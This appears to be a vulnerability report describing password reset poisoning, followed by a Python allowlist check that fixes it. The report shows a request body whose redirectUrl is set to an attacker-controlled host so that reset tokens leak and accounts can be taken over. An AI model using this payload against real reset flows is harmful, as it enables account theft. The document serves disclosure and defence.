The impact is similar to host header injection. In this particular case, the payload was passed in the request body. By default, the request body was set to {"redirectUrl": "https://hackerone.com/{token}"}. However, I modified it to {"redirectUrl": "https://attackcontroledsite.com/{}"}.
When the modified request is sent, the password reset email shows the link as "attackercontroledsite.com/thisisrandbutsecret_token". Once the victim clicks on the link, the attacker obtains the reset token. By placing that token after the appropriate host, i.e., "hackerone.com/resetoken", the attacker can take over the account.
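A server-side check that closes this hole, as an added example that is not code from the original report or from the affected application: the client-supplied redirectUrl is used only if it parses to an allowlisted origin, otherwise the server falls back to its own template. The names ALLOWED_ORIGINS, DEFAULT_TEMPLATE, safe_reset_template and build_reset_link are hypothetical, and the sample request bodies are constructed.

```python
from urllib.parse import urlsplit

# Assumption: the only origin this application may link to in reset emails.
ALLOWED_ORIGINS = {("https", "hackerone.com")}
DEFAULT_TEMPLATE = "https://hackerone.com/{token}"


def safe_reset_template(redirect_url):
    """Return redirect_url only if it targets an allowlisted origin."""
    if not isinstance(redirect_url, str):
        return DEFAULT_TEMPLATE
    # Backslashes and control characters are parsed differently by
    # browsers and server-side libraries, so refuse them outright.
    if any(c in redirect_url for c in "\\\r\n\t"):
        return DEFAULT_TEMPLATE
    try:
        parts = urlsplit(redirect_url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return DEFAULT_TEMPLATE
    # Compare the parsed scheme and host exactly; substring or prefix
    # checks would accept hackerone.com.evil.example or user@host tricks.
    if (parts.scheme, parts.hostname or "") not in ALLOWED_ORIGINS:
        return DEFAULT_TEMPLATE
    if parts.username or parts.password or port not in (None, 443):
        return DEFAULT_TEMPLATE
    # The template must still carry the placeholder the server fills in.
    if "{token}" not in parts.path:
        return DEFAULT_TEMPLATE
    return redirect_url


def build_reset_link(request_body, token):
    """Build the link placed in the password reset email."""
    template = safe_reset_template(request_body.get("redirectUrl"))
    return template.replace("{token}", token)


if __name__ == "__main__":
    # Constructed request bodies mirroring the two shown in the report.
    for body in (
        {"redirectUrl": "https://hackerone.com/{token}"},
        {"redirectUrl": "https://attackcontroledsite.com/{}"},
    ):
        print(body["redirectUrl"], "->", build_reset_link(body, "SAMPLE_TOKEN"))
```

Where the client has no legitimate need to choose the destination, dropping the redirectUrl parameter and always using the server-side template removes the input entirely.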